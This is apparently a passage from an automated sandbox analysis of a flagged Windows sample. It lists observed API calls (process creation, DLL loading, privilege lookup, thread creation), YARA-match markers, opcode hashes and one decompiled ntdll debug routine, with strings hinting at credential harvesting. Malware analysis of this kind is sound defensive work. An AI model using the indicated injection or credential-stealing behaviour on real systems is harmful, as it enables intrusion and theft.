                                                                                • API String ID: 3472027048-1269752229
                                                                                • Opcode ID: ecad969ad8b87c4d37e4da44edf1ebfd3bde3a639b87f56f1bb67fdde302d626
                                                                                • Instruction ID: 760c9c356f4715090e80642f0a9883775354d1497ab3d4d7c93e0da1c84e0047
                                                                                • Opcode Fuzzy Hash: ecad969ad8b87c4d37e4da44edf1ebfd3bde3a639b87f56f1bb67fdde302d626
                                                                                • Instruction Fuzzy Hash: 7321B1B1601306ABD710DFA4D8A1F6ABBB8BF88700F00841DF6199B286D370A855CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,004F3B93), ref: 005084ED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: .z`
                                                                                • API String ID: 3298025750-1441809116
                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                • Instruction ID: a6ba5ce49510d9448da473014ccd3278a8befd00257e2a36ed4cf697e10f5bfc
                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                • Instruction Fuzzy Hash: F4E01AB1200204ABDB14DF59CC49EA777ACAF88750F014554BA0857281CA30E9108AF0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004F72BA
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004F72DB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                • Instruction ID: 3c3362bf76221ac35178fe44fef8a3fc54cca203d5a92098ed6a354244879d63
                                                                                • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                • Instruction Fuzzy Hash: 1901A731A8032976E720A6949C03FFF776C6B40B50F154159FF04BA1C2E6986D0646F6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004F9B82
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                • Instruction ID: 3a61287c19da117873925b2aa1aa70406aa8dc2d21abd3e6c39e6a2374bfeb78
                                                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                • Instruction Fuzzy Hash: 840125B5D4020EB7DF10EBE4DC46F9EB778AB54308F004195EA0897281F675EB14C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00508584
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                • Instruction ID: a0bf003de01df09ce041c447679934a00c617342fa443a57aecb735cf8042606
                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                • Instruction Fuzzy Hash: CA01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00508584
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: f5382c78466a7d3bab35b1fa68a6f2c127623bb480aa3aad7c8847595f0ed5fc
                                                                                • Instruction ID: 964db35fd01ae341ef43500f85c417714784ea8317e6526e88fecabf08d30fe0
                                                                                • Opcode Fuzzy Hash: f5382c78466a7d3bab35b1fa68a6f2c127623bb480aa3aad7c8847595f0ed5fc
                                                                                • Instruction Fuzzy Hash: 8D01A4B2204108BFCB54CF99DC80EEB77A9AF8C354F158258FA4DD7251C630E851CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,004FCCC0,?,?), ref: 0050703C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                                • Instruction ID: 67b13fb5af95795b84c2cb3626931b7cc7e0a6fb83d2b92ad2f6bce2a53af203
                                                                                • Opcode Fuzzy Hash: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                                • Instruction Fuzzy Hash: 73E092733807043AE3306599AC03FABB79CDBC1B30F140126FA0DEB2C1D995F80142A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,004FCF92,004FCF92,?,00000000,?,?), ref: 00508650
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: 6ffc432552c6d0f45ec95aafc1131bae5762a8efeeceb7afdaf89421c850f3e0
                                                                                • Instruction ID: 3623b4ff5ce590e641765a69555aed1ff3e3fc3da78177072f3140b798101b2d
                                                                                • Opcode Fuzzy Hash: 6ffc432552c6d0f45ec95aafc1131bae5762a8efeeceb7afdaf89421c850f3e0
                                                                                • Instruction Fuzzy Hash: 04F039B1600214ABDB14DF48DC45EEB37A8EF88310F008565BA4C9B382DA30E9018BE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00503506,?,00503C7F,00503C7F,?,00503506,?,?,?,?,?,00000000,00000000,?), ref: 005084AD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                • Instruction ID: 3dace9e560aa7bfc082716fed783f3e8cb9985b4a7697b893e2d3affc3461af9
                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                • Instruction Fuzzy Hash: AFE01AB1200204ABDB14DF59CC45EA777ACAF88650F154558BA085B281C930F9108AF0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,004FCF92,004FCF92,?,00000000,?,?), ref: 00508650
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                • Instruction ID: 7c985d351388cbe7657adea13fc75bc9ea627ae67c0e9999220f9b163f951a40
                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                • Instruction Fuzzy Hash: 20E01AB1200208ABDB10DF49CC85EEB37ADAF88650F018154BA0857281C930E8108BF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,004F7C63,?), ref: 004FD42B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 837e3748d4f4ebdc7c91b9a69c0825f3fb8e9c393026bfdaf2a252bd95fba24c
                                                                                • Instruction ID: 7e7ec1892e89e67b9b11ca4cd66c25aaf5fddea8e5ae72ae03078a04e8a9d67e
                                                                                • Opcode Fuzzy Hash: 837e3748d4f4ebdc7c91b9a69c0825f3fb8e9c393026bfdaf2a252bd95fba24c
                                                                                • Instruction Fuzzy Hash: 5ED05B7679020536F710FEA49C06F263649AF99B50F49409DF548DF3C3D924D5118264
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,004F7C63,?), ref: 004FD42B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                • Instruction ID: 5774c268fcb994e0c69deef02324a40e08453a5075f6925780551b4a296da44a
                                                                                • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                • Instruction Fuzzy Hash: 0DD05E617903083AE610AAA49C07F26328DAB44B00F494064FA48973C3D964E5004165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e485c76660bf993b6d17da5894bf577c802efaa962f1cae454e85558a7b17960
                                                                                • Instruction ID: 1f7a777915ea4ab869f63204e8fb7cbd24bd304ab3836e43d79909ca44384a1b
                                                                                • Opcode Fuzzy Hash: e485c76660bf993b6d17da5894bf577c802efaa962f1cae454e85558a7b17960
                                                                                • Instruction Fuzzy Hash: 6DB09BF1D414C5D5FF51D7604608717790077D0745F16C057D1020655A477CD091F6B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: :$Port:User :$Server:$User :
                                                                                • API String ID: 0-1282517814
                                                                                • Opcode ID: d619e99cb3fe7f70621602f5a00a1117a9170200354a69ffcdcc1168e025a34e
                                                                                • Instruction ID: 376be413e6082b1197cc8eb25fa68009ec8edd3b2fe7b6838af2c76c9f6c0501
                                                                                • Opcode Fuzzy Hash: d619e99cb3fe7f70621602f5a00a1117a9170200354a69ffcdcc1168e025a34e
                                                                                • Instruction Fuzzy Hash: 8D5196B2801209A6CF21DFA4DC859DEBBBCFF58310F048999F54963145EE35E6888BE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69fbba612b46ac37ac6ba054ee88484481a034919c6103fe63875074f85fa1ec
                                                                                • Instruction ID: f76e0cf7679aa73f3aaa5bfc78df0e3cff430672523bb97b808194b79f4bd799
                                                                                • Opcode Fuzzy Hash: 69fbba612b46ac37ac6ba054ee88484481a034919c6103fe63875074f85fa1ec
                                                                                • Instruction Fuzzy Hash: 67F0A4B7A1660629E9109574BC46ABBB75CFFE2218F402225FC49D1187F263C61489A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 30ddec6b2f6df963080bcee46e1422e9a792c10e9b47600ed0e96d7a59673b2e
                                                                                • Instruction ID: a38dc24f6f9d0002091ee2befddc3477a5e74ebf1d9bf2573de23f7ea3fdd34c
                                                                                • Opcode Fuzzy Hash: 30ddec6b2f6df963080bcee46e1422e9a792c10e9b47600ed0e96d7a59673b2e
                                                                                • Instruction Fuzzy Hash: 4FE02B37B080DD46C7020D79A4440B4FF20D58723571827FBDE849B543C2214416C388
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84b60ba7592ecf7b06ae3c19c1b5c885ede942efa4d7e8c0635a513bf845ae93
                                                                                • Instruction ID: 6fe33dd33252c2f6f82ed75b84bd0eea641323b8dc639e8165b608f1b0e1d625
                                                                                • Opcode Fuzzy Hash: 84b60ba7592ecf7b06ae3c19c1b5c885ede942efa4d7e8c0635a513bf845ae93
                                                                                • Instruction Fuzzy Hash: 9EC04C23B66005499910984979411F9FBA99797124E446297E82877250964395554189
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Flags
                                                                                • String ID: Uopen$open$open
                                                                                • API String ID: 3401871038-2333744248
                                                                                • Opcode ID: 4f6e6a791fa9974c659c5605c97a337e6f48a02a4de5232eafc5dc0d69c2f3c1
                                                                                • Instruction ID: 04e7fb67daa2177b434f0093b9f9fc01a769f629469ef5eacb814f7aa5bbce11
                                                                                • Opcode Fuzzy Hash: 4f6e6a791fa9974c659c5605c97a337e6f48a02a4de5232eafc5dc0d69c2f3c1
                                                                                • Instruction Fuzzy Hash: 1511CB729403197AEB10EAA4CC46FDE7B6CAF40700F144188FA0C7B1C2D6B47A8587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Flags
                                                                                • String ID: Uopen$open$open
                                                                                • API String ID: 3401871038-2333744248
                                                                                • Opcode ID: 1510842b3563bad0a73086b71acc05e3d9cb6b7a5fcc328f68d9ac8a591a9d7f
                                                                                • Instruction ID: 4f3b2caadc65fab8153cb4cba3e66a37dc2a70597f3e5bcf958d2d193b87dd10
                                                                                • Opcode Fuzzy Hash: 1510842b3563bad0a73086b71acc05e3d9cb6b7a5fcc328f68d9ac8a591a9d7f
                                                                                • Instruction Fuzzy Hash: 1E118D729503197AE710EAA4CC46FDF7B6C9F44700F144145F708771C6DAB47A8587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E0451FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                				void* _t7;
                                                                                				intOrPtr _t9;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr* _t12;
                                                                                				intOrPtr* _t13;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr* _t15;
                                                                                
                                                                                				_t13 = __edx;
                                                                                				_push(_a4);
                                                                                				_t14 =  *[fs:0x18];
                                                                                				_t15 = _t12;
                                                                                				_t7 = E044CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                				_push(_t13);
                                                                                				E04515720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                				_t9 =  *_t15;
                                                                                				if(_t9 == 0xffffffff) {
                                                                                					_t10 = 0;
                                                                                				} else {
                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                				}
                                                                                				_push(_t10);
                                                                                				_push(_t15);
                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                				return E04515720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                			}










                                                                                0x0451fdda
                                                                                0x0451fde2
                                                                                0x0451fde5
                                                                                0x0451fdec
                                                                                0x0451fdfa
                                                                                0x0451fdff
                                                                                0x0451fe0a
                                                                                0x0451fe0f
                                                                                0x0451fe17
                                                                                0x0451fe1e
                                                                                0x0451fe19
                                                                                0x0451fe19
                                                                                0x0451fe19
                                                                                0x0451fe20
                                                                                0x0451fe21
                                                                                0x0451fe22
                                                                                0x0451fe25
                                                                                0x0451fe40

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0451FDFA
                                                                                Strings
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0451FE2B
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0451FE01
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                • API String ID: 885266447-3903918235
                                                                                • Opcode ID: e5e7f51d699175f1c0063cd4d779cad5fa50c2bdde30b686c6bd265ebd185239
                                                                                • Instruction ID: cbe62b7aaa43994465f8bbe39536c80fdf6ac20586e93e7c4b1d513159c06821
                                                                                • Opcode Fuzzy Hash: e5e7f51d699175f1c0063cd4d779cad5fa50c2bdde30b686c6bd265ebd185239
                                                                                • Instruction Fuzzy Hash: F4F0F636200201BFFA211A45DC42F63BF5BFB84770F240315F628565E1EAA2F860A6F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%